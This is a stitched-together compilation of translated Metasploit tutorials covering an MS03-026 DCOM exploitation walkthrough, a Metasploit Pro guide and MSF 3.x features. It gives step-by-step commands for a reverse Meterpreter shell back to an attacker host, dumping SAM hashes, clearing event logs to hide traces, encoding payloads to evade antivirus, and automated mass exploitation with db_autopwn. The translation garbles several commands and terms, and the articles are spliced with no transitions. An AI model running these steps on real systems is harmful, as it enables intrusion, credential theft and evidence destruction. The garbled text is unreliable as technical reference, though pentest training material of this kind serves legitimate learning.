Metasploit operating regulations. What is a metasploit and how does it work? General module settings

Original: Penetration Testing with Metasploit Framework
Posted by Dinesh Shetty
Publication date: July 2011
Translation: V. Semenenko
Translation date: July 2011

Introduction

Surely, when I say “Penetration Testing tool”, the first thing that comes to your mind when mentioning these phrases is the name. And no wonder! This project is one of the largest in the world written in the Ruby language. The total number of its lines exceeds 700,000! Today it is the de facto standard for pentesting and searching for vulnerabilities. The number of annual downloads of copies of the program exceeds one million. The project also has the world's largest publicly available database of verified, high-quality exploits.

In the msfconsole console, type the search dcerpc command to search for all exploits whose names match the dcerpc pattern. All of them can be used to gain access to the server using port 135 vulnerabilities. As soon as we type this command in the line, we will get a list of all exploits in the msfconsole window, as shown in the screenshot Figure3.

Step 4:

Now that we have a list of rpc exploits in front of us, we need more complete information on each of them before we put it into practice. To get a detailed description of a specific exploit, we will use the command info exploit/windows/dcerpc/ms03_026_dcom. What will we get in the end? Description of possible goals; exploit requirements; a detailed description of the vulnerability used by this exploit; as well as links where we can find more detailed information.

Step 5:

In general, running the use command launches the environment of the specified exploit. In our case, we will use the command use exploit/windows/dcerpc/ms03_026_dcom to launch this exploit.

As you can see in the screenshot Figure4, after running the exploit with the command exploit/windows/dcerpc/ms03_026_dcom, the command line prompt changed from msf > to msf exploit(ms03_026_dcom) > . This means that we have moved into the temporary environment of this exploit.

Step 6:

Now we need to edit the configuration file of the exploit, as required by the current scenario. The show options command will show us the various options that are required for the currently running exploit. In our case, the RPORT option is already set to 135. All we have to do is set the value of the RHOST parameter, which is performed with the set RHOST command.

We enter set RHOST 192.168.42.129 on the command line and see the result - the IP address of the remote host is set to 192.168.42.129, as in the screenshot.

Step 7:

The last thing we need to do before running the exploit is to install the payload for it. All available payload options can be seen using the show payloads command.

As you can see in the screenshot, the show payloads command will show us all payloads that are compatible with the exploit we have chosen. For our case, we use a spare tcp meterpreter, specifying it with the command set PAYLOAD windows/meterpreter/reserve_tcp, which will launch a command shell on the remote server, if it is successfully accessed, we now need to run the show options command again to ensure that all the required fields have the appropriate values ​​so that the exploit can run successfully.

Note that the LHOST option for payload" is not set. So we need to set the local IP address (for example, 192.168.42.128) with the set LHOST 192.168.42.128 command.

Step 8:

Now that everything is ready and the exploit is configured properly, it's time to run it.

We can use the check command to make sure that our victim machine is available to run the exploit on. This option is not available for all exploits. For example, the screenshot clearly shows that in our case this is exactly the case.

But it's worth using in any case. This is a good help from the system in the sense that it allows you to make sure that the remote machine has not yet been patched with the exploit that you are about to launch. In other words, so that you do not run the exploit on a remote machine again.

In our case, as you can see in the screenshot, the exploits we selected do not support the check option.

The exploit command launches the selected exploit, which performs all the necessary actions so that the payload can be executed on the remote machine.

The screenshot shows that the exploit was successfully executed on a remote machine with the IP address 192.168.42.129, using the vulnerability of port 135. The fact of successful execution of the exploit is indicated on the command line by changing the last prompt to meterpreter > .

Step 9:

Now that an additional connection has been established between the victim and our machine, we need to gain control of the server. We can use help to get a list of all the available commands that we can run on the remote server to perform the appropriate actions.

Below are the results of some meterpreter commands:

• ipconfig - shows configuration data of all TCP/IP connections running on the remote machine;
• getuid - displays the server name in the console;
• hashdump - creates a dump of the SAM database;
• clearev - erases any traces of your presence on the remote machine that you might have left there.

Thus, we successfully used the framework to gain access to a remote server running Windows 2003 Server on it. We've given ourselves the ability to run commands in a shell, which gives us full control of the remote machine and the ability to run whatever tasks we want on it.

Potential uses of the Metasploit framework:

• can be used in pentesting to create reports, in conjunction with other automatic vulnerability detection systems. Using this framework, you can determine whether vulnerabilities are really dangerous and whether they can be used to penetrate the system.
• can be used to test new exploits that appear literally every day. You can do this check on a local server specially designed for this purpose. With this framework, you can easily check whether a new exploit is effective or not.
• is also a great tool in your pentesting systems to verify that IDS are configured properly in the event of an attack.

Conclusion

This article is a superficial overview of using the framework. This shows you how to perform a general overview of your system for vulnerabilities. Even the initial experience with , acquired in this article, will help you understand how exploits work. Which can be a good help in the future for writing your own exploits. And this, in turn, will help you perform pentesting tasks at a higher and higher quality level.

We have written many articles on hacking using Metasploit, including how to leave no traces, about studying the internal architecture of a site, as well as a lot of cheat sheets on commands and scripts.

With this guide we begin a comprehensive series of articles for learning and use Metasploit. This is the first introductory part, which will briefly cover the basics Metasploit- one of the most powerful hacking platforms on planet Earth.

Origin and installation of Metasploit

Metasploit is an open source project developed by hacker HD Moore in 2003. It was originally written in Perl, but in 2007 it was completely rewritten in Ruby. In 2009 it was bought out Rapid7, a company specializing in providing information security services, which also released a vulnerability scanner Nexpose.

Metasploit version 4.12 is already included in the distribution Kali Linux. It is also built into BackTrack. If you are using a different distribution Linux or MaxOS, then you will have to download it from the site Rapid7.

If you are using Windows, then you will also have to download Metasploit from the site Rapid7, but we do not recommend running it in Windows. You can certainly do this, but many of the features we'll cover in this article simply won't work there.

U Metasploit there are several versions, including Metasploit Pro(fully commercial version) and Community Edition(free). The last one is built into Kali. We will focus on Community Edition, because we think most of you won't buy the $30,000 Pro version.

Ways to use Metasploit

Metasploit can be used in several ways. The most common method, which we use all the time, is the interactive console Metasploit. It is activated by entering msfconsole at the command line Kali. There are also several other methods.

Msfcli

Let's start with what you can use Metasploit from the command line Kali or in mode msfcli. At first glance, it appears that when we are in the console, we are using the command line. In reality, we use an interactive console with special keywords and commands. When do we work from msfcli, then we actually use the Linux command line.

To get information about all available commands msfcli, type in the console:

Kali > msfcli -h

Now to run the exploit from msfcli type the command:

Kali > msfcli payload = rhost = lhost = E

Where "E" is short for "Execute"

In our article on creating payload(payloads) to protect against antivirus programs we use the command msfencode And msfpayload in command line mode ( msfcli).

Disadvantage of using msfcli is that it is not as well supported as msfconsole, and you're limited to a single shell, making some of the more advanced exploits impossible.

Armitage

If you want to use Metasploit with a graphical user interface (GUI), then there are several options. For example, Raphael Mudge developed Armitage(this is the name of the main character in the highly original sci-fi cyber hacking book Neuromancer. It is a must read for every hacker who enjoys the genre SciFi).

To start it Armitage V Kali, just enter:

Kali > armitage

If Armitage cannot connect, then try other commands:

Kali > service start postgresql kali > service start metasploit kali > service stop metasploit

Armitage is a graphical interface on top of itself Metasploit, built on a client-server architecture. you run Metasploit as a server, and Armitage becomes its client, giving you full access to the functions Metasploit using a fully functional, although not intuitive, GUI. If you really need GUI to feel comfortable, then please use Armitage. But mastering the command line is practically a vital necessity for any self-respecting hacker.

Modules

U Metasploit There are six different modules:

1. payloads
2. exploits
3. post
4. nops
5. auxiliary
6. encoders

Payloads- this is the code that we leave on the hacked system. Some call them listeners, rootkits, etc. IN Metasploit these are called payloads. Payloads include command line utilities, Meterpreter etc. Payload's come in different types, for example, staged, inline, NoNX(bypasses the "No Execute" feature on some modern processors) PassiveX(bypasses firewall rules about outgoing traffic), IPv6 and others.

Exploits is a shellcode that exploits a vulnerability or flaw in a system. This is very specific code. For example, there are exploits for the operating system, service packs (SPs), for specific services, ports, and even for applications. They can also be classified by type of operating system, so the exploit Windows doesn't work in Linux and vice versa.

Post- these are modules that we can use for post-exploitation attacks on the system (i.e. after gaining access to the system).

Nops- short for No OPerationS. On x86 family processors it is usually specified as hexadecimal 0x90. It simply means "do nothing." This can be critical for buffer overflow attacks. We can look at the modules nops using the command show.

Msf>show nops

Auxiliary- includes many modules (695) that do not fit into any of the other categories. These include things like fusers, scanners, DoS (denial of service) attack modules, and much more. For more detailed information, I refer you to our article on Auxiliary modules.

Encoders- these are modules that allow us to encode our payloads in different ways to bypass antivirus software and other security systems. We can see these encoders by typing:

Msf>show encoders

As you can see, in Metasploit There are quite a few encoders built in. One of our favorites - shikata_ga_nai. It allows you to use payload XOR, which helps to deceive antivirus programs and other security systems.

Search

IN Metasploit 4 a search option appeared. Previously I had to use msfcli and team grep to find modules. Now Rapid7 added keyword search and some other features. The addition of search was very timely because Metasploit has grown significantly, and ordinary search for queries grep it was no longer enough to find anything among more than 1,400 exploits.

Keyword search allows you to perform both simple searches and more detailed search queries. For example, we can define the type of module we want to find using the type keyword:

Msf > search type:exploit

If we do this then Metasploit will return us 1295 exploits. Not very useful.

But if we know that we want to attack the car Sun Microsystems governed by Solaris (Sun UNIX), then we can refine our search and look only for exploits for Solaris. In this case we need to use the keyword platform.

Msf > search type:exploit platform:solaris

We have now narrowed our search to those few exploits that will work against Solaris.

To further refine the search, let's assume we want to attack Solaris RPC (sunrpc) and, accordingly, we need to see only those exploits that attack this specific service. We add the keyword " sunrpc" into our search query as shown below:

Msf > search type:exploit platform:solaris sunrpc

As you can see, this narrowed the search results down to five exploit modules!

U Metasploit there are many possibilities that we will continue to explore in future articles on Metasploit. Try some of the hacks on Metasploit‘e, described in other posts on the site. Be sure to come back! You will study Metasploit and learn to hack like a pro!

Denial of responsibility: This article is written for educational purposes only. The author or publisher did not publish this article for malicious purposes. If readers would like to use the information for personal gain, the author and publisher are not responsible for any harm or damage caused.

First thing to do. If you haven't downloaded Metasploit yet, check out

Hidden from guests

And if Metasploit is already installed on your computer, congratulations! You can start working.

About Metasploit

Metasploit is a platform for testing, finding and exploiting vulnerabilities. It includes the Metasploit frameworks and their commercial counterparts: Metasploit Pro, Express, Community and Nexpose Ultimate.

Metasploit framework

The Metasploit Framework is the basis for creating commercial products. This is a project with

Hidden from guests

Which provides the infrastructure, content and tools to conduct tests and extensive security audits. Thanks to the open source community and its own hard-working content team, new modules are added regularly. This means that they become available to you immediately after publication.

There are quite a few resources on the Internet that can help you learn how to use the Metasploit framework. However, we strongly recommend that you read

Hidden from guests

Which is supported by the Rapid 7 team.

If you can't find what you need, let us know and we'll add the information you need.

Metasploit Pro and other commercial versions

Commercial versions of Metasploit, which include Pro, Express, Community and Nexpose Ultimate, are available for users who prefer to use a web-based penetration testing interface. In addition to the web interface, some commercial publications provide features that are not available in the Metasploit Framework.

Most of the additional features are aimed at automating and optimizing common testing tasks, such as vulnerability testing, social engineering, and brute-force attack techniques.

If you use the command line but still want access to commercial features, don't worry. Metasploit Pro includes a console that is very similar to the Msf console, except that it gives access to most of the Metasploit Provia command line features.

Launching Metasploit

Rapid7 provides commercial and open source versions of Metasploit for Linux and Windows operating systems.

You can download and run the file to install Metasploit Pro on your local computer or on a remote host. Regardless of where you install Metasploit Pro, you can access the interface through a web browser. Metasploit uses a secure connection to the server.

If you have installed Metasploit Pro on a web server, users can use a web browser to access the interface from anywhere. Users need to know the server address and port. By default, the Metasploit service uses port 3790. You can change the port that Metasploit uses during the installation process.

If Metasploit is running again on your local machine, you can use localhost and port 3790 to access Metasploit Pro. For example, enter

Hidden from guests

In the browser URL to load the UI.

For more information about installation, see the section "Installing the Metasploit framework" or "

Hidden from guests

».

Metasploit Pro Components

Metasploit Pro consists of several components that provide a complete package of testing tools. The following components are included with Metasploit Pro.

Metasploit framework

Metasploit Framework is an open source testing framework that provides access to a variety of applications, operating systems, and platforms. You can use the Metasploit Framework to create additional custom security tools or write your own code for new vulnerabilities.

The Metasploit team regularly releases updates that contain new modules and updates that contain fixes and improvements for Metasploit Pro.

Modules

A module is a single piece of code or software that extends the functionality of the Metasploit Framework. The modules automate the functionality provided by the Metasploit Framework.
There are modules: exploit, payload, NOP, post-exploitation module and others. The module type determines its purpose.

Services

Metasploit uses the following services:

• Postgre SQL runs the database that Metasploit Pro uses to store project data.
• Ruby on Rails runs the Metasploit Pro web interface.
• The Pro service or Metasploit service uses Rails, the Metasploit framework and the Metasploit RPC server.

Web interface

A web interface is available for working with Metasploit Pro. To run it, open your browser and go to

Hidden from guests

.

Command Line Interface

Console Pro allows you to execute the command line using Metasploit.

Basic concepts and terms

To introduce you to Metasploit Pro, here are some concepts and terms you need to understand:

• Additional module: A module that does not perform payload. Examples of additional modules: scanners, denial of server attacks, etc.
• Bind-shell payload: A command line that attaches a listener to the system being used and waits for a connection to the listener.
• Database: The database stores host data, system logs, collected information and report data.
• Expanded scan: An expanded scan is a Metasploit scan that connects Nmap and various Metasploit modules.
• Exploit: A program that takes advantage of a specific vulnerability and gives an attacker access to the target system. The program, as a rule, contains payload and delivers it to the target. For example, one of the most common exploits is MS08-067, which targets a Windows service vulnerability and allows remote code execution.
• Exploit module: A module that executes a sequence of commands to exploit a vulnerability in a system or application to gain access to the target system. In short, the exploit creates a session. Exploit modules include: buffer overflow, code injection, and web application exploits.
• Listener: The listener waits for a connection signal from any exploited target or attacking machine and controls the connection.
• Meterpreter: An advanced multifunctional payload that provides an interactive shell. From the Meterpreter shell you can download a file, get password hashes for user accounts, etc. Meterpreter is memory-based, so most intrusion detection systems do not see it.
• Module: A standalone piece of code that extends the functionality of the Metasploit Framework. There are different types of modules: exploit, additional or post-exploitation. The module type determines its purpose. For example, any module that can open the target's shell is called an exploit. Popular exploit module MS08-067.
• Payload: The actual code that is used on the target system after the exploit successfully compromises the target. Payload allows you to define how you want to connect to the shell and what you want to do about the target system after you start monitoring it. Payload can be the opposite or associated with the shell. The main difference between these two types is the direction of communication.
• Post-exploitation module: A module that allows you to collect more information or gain further access to the exploited target system. Examples of post-exploitation modules include scribe applications and services.
• Project: Container for goals, tasks, reports and data that are part of the scan. The project contains a workspace that is used to create scans and configure tasks. Every penetration test works from within the project.
• Payload reverse shell: Shell that connects to the attacking machine.
• Shell (shell): An interface that provides access to a remote target.
• Shell code: A set of instructions that the exploit uses as its payload.
• Task: An action that Metasploit can perform, such as scanning, exploitation, reporting.
• Working space: Same as project, except that it is only used when working with the Metasploit Framework.
• Vulnerability: A security flaw that allows an attacker to compromise a target. A compromised system can cause escalation of privileges, unauthorized access to data, theft of passwords, and buffer overflow.

How Metasploit Pro works

The overall penetration testing process can be divided into several stages or phases. Depending on the methodology you use, a penetration test can involve anywhere from four to seven phases. The names of the stages may vary, but they generally consist of: probing, scanning, operation, post-operation, maintaining access, cleaning and reporting.

Metasploit Pro can work based on different stages of testing. The workflow generally includes the following steps:

1. Create a Project: Create a project to store the data collected from your targets.
2. Information Gathering: Uses extensive scanning, Nexpose or tools to provide Metasploit Pro with host data, which can help identify vulnerabilities.
3. Exploit: Uses automated or manual exploits to launch attacks against known vulnerabilities and gain access to compromised targets.
4. Post-exploitation: Use post-exploitation modules or interactive sessions to gather more information about compromised targets. Metasploit Pro provides several tools that can be used to interact with open sessions on a live machine. For example, you can look at shared file systems on compromised targets to identify information about internal applications and exploit the password and hash collection feature.
5. Brute-force attack: Run a brute-force attack to check the collected passwords to discover valid logins.
6. Clearing Open Sessions: You can close open sessions on used targets to remove any information about the data that may be on the system. This process restores the original settings on the target system.
7. Report Generation: Generate a report with detailed findings. Metasploit Pro provides several report types that you can use to customize your report data. The most commonly used is the audit report, which provides a detailed assessment of the hosts and credentials captured in the project.

Access to Metasploit Pro via web interface

To use the web interface to work with Metasploit Pro, open your browser and go to

Hidden from guests

If Metasploit is re-run on your computer, you need to replace Localhost with the address of the remote computer.
To log into the web interface, you need the username and password for the account created when activating the license key for Metasploit Pro. If you can't remember the password you set for your account, you need it

Hidden from guests

.
Supported Browsers

If the user interface does not display all elements as expected, please ensure that you are using one of the supported browsers listed below:

• Google Chrome 10+
• Mozilla Firefox 18+
• Internet Explorer 10+
• Iceweasel 18+

Accessing Metasploit Pro from the Command Line

Pro Console provides Metasploit Pro functionality through a command line interface and serves as an alternative to Metasploit Web UI. If you're a traditional Metasploit Framework user, then Pro Console will give you something similar to the Msf console.

You can use Pro Console to perform the following tasks:

• Creation and management of projects.
• Scanning and listing hosts.
• Import and export of data.
• Setting up and launching modules.
• Launching automated exploits.
• View information about hosts.
• Collecting data from systems in use.

You cannot perform all tasks through the Pro console. Tasks that are not supported: reporting, social engineering, running Meta modules, setting up a task chain, launching a brute force attack, scanning web applications.​

Running Pro Console on Windows

To launch the console on Windows, select Start > Metasploit > Metasploit Console.

You can also launch the console from the command line. To launch the console from the command line, enter the following:

$cd/metasploit $console.bat

Running Pro Console on Linux

To launch the console on Linux, follow these steps:

$ cd /opt/Metasploit/ $ sudo msfpro

Projects page

Now that you know some of the basics of Metasploit, let's take a closer look at Metasploit Pro. After logging into Metasploit Pro, the first screen that opens is the Projects page. Here are all the projects currently stored in Metasploit Pro. You also have access to news about products and the launch of wizards and tools.

No matter where you are in the application, you can choose Projects > Show all projects from the toolbar or click on the Metasploit Pro logo to go to the page (see below):

Toolbar

The main toolbar is located at the top of the web interface. It is accessible from anywhere in Metasploit Pro. You can use the toolbar to access the project menu, account settings, and admin menu.

Quick Start Wizard

Each Quick Start Wizard operates through a guided interface that guides you through a penetration testing task, such as scanning and exploiting a target, creating engineered social campaigns, scanning and exploiting web applications, and testing vulnerabilities.

You can click on any of the Quick Launch Wizard icons to launch the guided interface.

Product news

This section contains the latest news about Rapid 7. If you want to use the latest modules from Rapid 7 and the community, the Product News panel is a great place to learn more about the latest updates.

If for some reason you don't want to see the news panel, you can hide it so that it doesn't appear on the projects page.

Creating a Project

Now that you're familiar with the projects page, let's try creating a project.

The project contains a workspace and data storage. It is possible to interact in logical groups. You will often have different requirements for different subnets in your organization, so having multiple projects to represent those requirements is a great idea.

For example, you can create a project for the HR department and another project for the IT department. Your requirements for these departments may be very different, so it is logical to distribute goals into different projects. You can create separate reports for each department to benchmark and share your findings with the organization.

Creating a project is simple. You can press the button New project on the projects page or select Project > New Project on the main toolbar.

When the New Projects page appears, all you need to do is provide a name. If you want to customize the project, you can add a description, specify the network range, and also assign user access level.

Would you like to know more about the projects?

Hidden from guests

.

Receiving target data

The next thing to do is add data to the project. There are several ways to do this:

• Run a detailed scan.
• Import data you already have.

Scan goals

Scanning is the process of examining hosts and listing open ports to gain visibility into the services running on the network. Scanning allows you to identify active systems with services through which you can communicate. This allows you to develop an effective plan of attack.

Metasploit has its own built-in, deployed scanner that uses Nmap to perform TCP port scans and collect additional information about target hosts.

By default, the probe process includes a UDP scan, which sends UDP probes to the most well-known UDP ports, such as NETBIOS, DHCP, DNS and SNMP. The scan checks about 250 ports, which are typically used by external services.

During the scanning process, Metasploit Pro automatically saves host data in the project. You can view host data to get a better understanding of the network topology and determine the best use for each target. The more information you can gather about a target, the more accurately you can tailor a test for it.

Starting testing is not a difficult process. Within the project, click the button Scan.

When the New Deployed Scan form appears, enter the hosts you want to scan in the " Target addresses" You can enter a single IP address, an IP range, or a standard CIDR entry. Each element must appear in a new line.

You can start a scan with just one target range. However, if you want to customize your scanning in more detail, you can use the advanced options. For example, you can specify the hosts you want to exclude from scanning and set the scanning speed.

Want to learn more about detailed scanning? Go to

Hidden from guests

.

Import data

If you use a vulnerability scanner, you can import the vulnerability report into the Metasploit project. Imported vulnerability data also includes host metadata that can be analyzed to identify additional attack paths. Metasploit supports several vulnerability scanners, including Nessus, Qualys, and Core Impact.

You can also export and import data from one Metasploit project to another. This allows you to share results between projects and other team members.

To import data into your project, click the Import button. When the data import page appears, select import from NeXpose or import from file. Depending on the option you select, the form will display the options you need to configure to import the file.

For example, if you want to import from NeXpose, you need to select the console you want to use to run the scan or import the site. If you want to import a file, you need to navigate to the file location.
To see a full list of available import types and learn more about importing, go to

Hidden from guests

.

View and manage host data

You can view host data at the project level or at the host level. At the project level, Metasploit provides a view of all the hosts that have been added to the project.

To access project-level viewing, select Analysis > Hosts.

The project level view initially shows a list of hosts with the number of ports and services for each host. You can also view all records, services, vulnerabilities, and received data for a project. To access them, click on their tabs.

To view detailed details for a host, you must click the Host IP Address button. This is a good way to see the vulnerabilities and credentials of a specific host.

Run a vulnerability scan

After adding target data to your project, you can run a vulnerability scan to pinpoint security flaws that could be exploited. Scanners check for known vulnerabilities and configuration errors that exist on target machines. This information will help you determine possible directions and plans of attack.
Integration with NeXpose allows you to run vulnerability scans directly from the Metasploit web interface. NeXpose scanning identifies active services, open ports, and applications that are running on each host; NeXpose attempts to identify vulnerabilities that may exist based on known services and applications.
To start a NeXpose scan, click the button NeXpose located in the taskbar.

When the NeXpose settings form appears, you need to configure and select the console you want to use to perform the scan. You also need to define the hosts to scan and select one of the available scan templates, which determines the level of auditing to use. For more information about scan patterns, check out

Hidden from guests

.

To view all potential vulnerabilities that NeXpose has found, select Analysis > Vulnerabilities. You can click on the vulnerability name to view the modules that were used to find it.

Important information: operation.

Vulnerability scanners are useful tools that can help you quickly find potential security flaws. However, you can run some helper modules such as FTP, SMB and VNC to manually identify potential vulnerabilities that could be exploited. Manual vulnerability analysis is significantly more time-consuming and requires critical thinking as well as in-depth knowledge on your part, but it will help you create an accurate and effective attack plan.​

An easy way to find and exploit vulnerabilities

The easiest way to scan and verify vulnerabilities is with the scan wizard, which automates the scanning process for NeXpose and Metasploit Pro users. The wizard provides a guided, user-friendly interface to guide you through the verification process, from importing NeXpose data to automatically exploiting vulnerabilities to send verification results back to NeXpose.

If you do not have access to NeXpose and/or Metasploit Pro, a manual vulnerability analysis will be required to verify. Manual scanning requires a little more effort, but provides much greater control over vulnerabilities.
To find out more information about vulnerability scanning, go to

Hidden from guests

.

Exploitation of known vulnerabilities

Once you have gathered information about your targets and identified potential vulnerabilities, you can move on to the exploitation phase. Exploitation is the process of launching exploits against discovered vulnerabilities. Successful exploitation provides access to target systems so you can obtain password hashes and configuration files.

Metasploit offers several different methods that can be used for exploitation: automatic exploitation and manual exploitation.

Automatic operation

Automatic exploitation uses cross-references, open services, vulnerable links to find relevant exploits. All exploits are added to the attack plan, which determines the exploits to be launched. The feature of automated exploitation is to end the session as quickly as possible by using the data that Metasploit has for the target hosts.

To start automatic operation, press the button Exploitation located in the taskbar.

You must provide the hosts you want to exploit and the minimum reliability for each exploit. Minimum reliability can be set to ensure that the exploits that run are safe. The higher the level of reliability, the less likely it is that exploits will be used by malicious services. For descriptions of each module, go to this page.

Manual operation

Manual exploitation provides a more focused and methodical approach to exploiting vulnerabilities. With its help, you can launch selected exploits one at a time. This method is especially useful if there is a specific vulnerability that you want to exploit.

For example, if you know that the SMB server on Windows XP does not have the MS08-067 patch, you can try running the corresponding module to use it.

To search for modules, select Modules > Search and enter the name of the module you want to run. The best way to find a module is to search for the vulnerability link. For example, if you want to search for forms 08-067, you can search for 'ms08-067'. You can also search by the module path: exploit/windows/smb/ms08_067_netapi.

One of the easiest and most convenient ways to find an exploit for a vulnerability is directly on the vulnerability page. To view all vulnerabilities in a project, select Analysis > Vulnerabilities. You can click on a vulnerability name to view associated modules that can be used to exploit it.

A separate vulnerability type shows a list of exploits that can be used against the host. You can press the button Use to open the module settings page.

General module settings

Each module has its own set of options that can be customized to suit your needs. There are so many possibilities that it is impossible to list them all here. However, below are a few options that are commonly used to configure modules:

• Payload Type: Determines the type of payload the exploit will deliver to the target. Select one of the following payload types:
• Command: Payload that executes the command. It can be used to execute commands on a remote computer.
• Meterpreter: A progressive payload that provides a command line with which you can deliver commands and apply extensions.
• Connection Type: Determines how Metasploit will connect to the target. Select one of the following connection types:
• Automatic: Automatic connection uses the associated connection if NAT was detected; otherwise, feedback is used.
• Linked: A chained connection is used, which is especially important if the target is not within a firewall or NAT gateway.
• Reverse: Uses feedback, which is especially important if your system is unable to initiate a connection with targets.
• LHOST: Specifies the local host address.
• LPORT: Specifies the ports you want to use for loopbacks.
• RHOST: Specifies the target address.
• RPORT: Specifies the remote port you want to attack.
• Target Settings: Specifies the target operating system and version.
• Exploit Timeout: Defines a timeout of several minutes.

Post-operation and data collection

Any exploit that successfully exploits the results of vulnerabilities in an open session you can use to extract information from the target. The real impact of the attack depends on the data you can obtain from the target (e.g. password hashes, system files) and how you will use that data to gain access to additional systems.
To view a list of open sessions, select the tab Sessions (Sessions). Click on a session ID to view post-exploitation tasks that can be launched against the host.

In order to collect data from the operating system, click on the button Collect.

The list of all open sessions shows the type of data that can be collected.

Clearing sessions

When you're done with an open session, you can clear it before logging out. This will remove any evidence that may be left in the system. To clear your session, go to Sessions and press the button Clean up (Clear).

When the clear session page appears, select the sessions you want to close, then click on the button Clean up
Sessions.

Create a report

At the end of the penetration test, you can generate a report. Metasploit provides several types of reports that can be used to compile test results and consolidate data. Each report organizes its findings into appropriate sections, displays charts and graphs for statistical data, and summarizes key findings.
To learn more about reports, go to

Hidden from guests

.

Additional Resources

We have studied a lot of information. If you would like to explore certain issues in more detail, please contact

Hidden from guests

.

Now that you know how to perform common tasks in Metasploit Pro, check out the other options you can use:

• Do you want to automate tasks? Familiarize yourself with chain problems.
• Interested in brute force attack?

  Hidden from guests

  .
• Want to start a security awareness program?

  Hidden from guests

  How to build a social engineering campaign.

• Prefer the command line?

  Hidden from guests

  .
• Interested in frameworks?

  Hidden from guests

  .

Having been born 7 years ago, MSF subsequently transformed from a simple framework for writing working exploits, first into a kind of “Swiss knife”, and now into a whole workshop for conducting pentests, including everything necessary - from collecting information to advanced methods of post-exploitation. It’s not for nothing that MSF is one of the five most used tools. And the good news is that MSF continues to grow and develop! And in which direction - you will find out from this article.

Initially, the article was supposed to describe the possibilities of automating actions in MSF, but after analyzing people’s knowledge about the framework, it was decided to talk about its more or less advanced built-in capabilities, and their automation will be discussed along the way. This is so that people don't reinvent the wheel :).

By the way, about knowledge. It is not surprising that there are not many of them, since there are no comprehensive articles/books about Metasploit even in English. So the main sources of information are foreign blogs and personal research. Plus, I’m glad that Ruby is a simple thing, and you can do something useful using other people’s examples.
But to the point! Everything described concerns the latest version – MSF 3.4.2.

GUI is back!

For those who don't like the console or are too lazy to deal with MSF commands, there is a GTK-based GUI shell. More precisely, it existed, since it was abandoned in version 3.3. If I'm not mistaken, the same thing happened with msfweb. That is, you can still use it, but there were problems with stability anyway, but here... eh!

But while preparing the article, something good happened - a new gooey shell. She has changed both outside and inside. More precisely, it is written in Java, therefore it is cross-platform, and also interacts with MSF via the XMLRPC interface, that is, it can be used remotely.

Launching the gui is done in two stages: start msfrpcd, connect to it via msfgui. Under niks, having launched msfgui, you can simply click “start new msfprcd”

Win version:

1. Launch the Cygwin console
2. cd /msf3
3. msfrpcd -S -U username -P password where –S – disable SSL, and invented login/pass
4. run msfgui.jar, which is stored in %MSF%\msf3\data\gui either by double-clicking or in the console (not in cygwin): java –jar msfgui.jar

In msfgui we enter login/pass, port, IP and connect.

Something is missing, even compared to the old gui. For example, accessing the console or viewing logs. But you can work, especially if you need to quickly go through plugins, modules, surf on someone else’s computer, etc.

Collection of information

You should know that MSF works with a database to store information and exchange it between its modules. And this direction is actively developing.

For starters, the only fully supported database is PostgreSQL. SQLite was abandoned due to performance/scalability issues, and something didn’t go smoothly with MySQL either. In general, installing Postgres should not cause problems. The driver for interaction is built into MSF.

Under Win: install, set the pass for the user - postgres and port.

Via pgAdmin: connect to the local server, create another “Login Role” user (msf_user), create a database in the “Bases” (msf_db). There you can configure the SQL server itself, making it “safer”, and even crawl through MSF tables.

msf> db_driver postgresql
msf> db_connect msf_user: [email protected]:5432/msf_db

Now the db_create command does not work directly, you can only connect to an existing database, and if you have the appropriate rights (like the postgres user), the database will be automatically created. Otherwise, create the database manually in Postgres.

But this is not so scary, because you can use workspaces. There is one database, the tables are the same, but the modules exchange/add information only in the current space. If you try it, you will understand that db_workspace will help you.

Let's take a look at the commands a little:

• db_service – displays information about ports/services scanned either by modules, built-in nmap, or imported from third-party programs. Based on this, db_autopwn works with the –p parameter (by port);
• db_notes – “notes”, such as the OS version received from Nmap, or some “details” received by WMap. It's a shame, but db_autopwn doesn't seem to look at db_notes to select a exploit.
• db_vulns – vulnerabilities found either by MSF modules (WMap), or imported from Nessus (OpenVAS), Nexpose. Based on this, db_autopwn works with the –x parameter (by vulnerabilities).

For example, let’s scan the host with nmap and the results will go into our database:

msf> db_nmap –PN –sV 192.168.0.101

The result from the port scanner module from MSF will be similar, and the data will also end up in the database. But to define services you need to use other modules (all aux modules with “version” at the end in the scanner section, for example, scanner/imap/imap_verison).

msf> use scanner/portscan/tcp
msf> set RHOSTS 192.168.0.101
msf> set PORTS 1-1000
msf> run -j

To automate the last actions, and indeed any actions in MSF, you can use the so-called resource files. Essentially, these are ordinary text files with a sequential listing of commands for MSF. For example, let’s create a resource for quickly launching a “server” for reverse meterpreter. To do this, put the following commands into the file (metrevhandl.rc):

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.0.102
exploit –j
back

We run our script using “resource”:

msf> resource metrevhandl.rc

As you can see, it is very convenient. But that is not all. The best part is that you can write Ruby code in these scripts, which allows us, for example, to establish relationships between individual MSF modules.

By the way, home/.msf3/msfconsole.rc is a script that is automatically launched when msfconsole starts. It’s very convenient to push a connection into a database, for example.

Let's go...

WMAP. WMAP is an attempt to tailor MSF for web applications and somehow automate the whole thing. The WMAP project is still in its early stages and is not performing particularly well, especially compared to its competitors. It is unlikely that it will develop, at least in its current form, and the reason is that Rapid7 has begun to heavily fund the open source w3af framework, which is tailored for the web, so we can expect a merger of the internals or functionality of MSF and w3af. But still a small example (requires a connection to the database):

1. Load the wmap plugin:

msf> load db_wmap

2. Adding a victim:

msf> wmap_targets -a http://www.example.com/

3. View and launch modules against our victim:

msf> wmap_run -t
msf> wmap_run –e

The results are stored in the database and are available through db_vulns, db_notes.

Some modules require settings to be configured. This can be done using the setg command. WMAP also has a spider (wmap_crawler) and the ability to interact with a proxy (wmap_proxy).

In addition, for those who like to torture databases with all kinds of injections, I advise you to look at the MSF module - scanner/http/sqlmap. This is a port of the tool of the same name – SQLmap. The thing is, by the way, powerful :). Information about the tool can be found on the creators’ website -.

db_autopwn

The auto dump in MSF has acquired a couple of useful parameters:

• -R – indicates the minimum rank of exploit that will be used;
• -m – set the regexp for selecting rafts.

For example:

msf> db_autopwn -t -p -m windows -R excellent

will display a list of only the best exploits for standard Win services.

By the way, from version 3.3.1 you can work with Nexpose directly from MFS and immediately auto-pavn based on identified vulnerabilities.

1. Load the plugin and connect to Nexpose:

msf> load next
msf> nexpose_connect msf_user: [email protected]

2. We launch only the best exploits for the vulnerabilities found:

msf> nexpose_scan -R excellent -x 192.168.0.101

Browser_autopwn

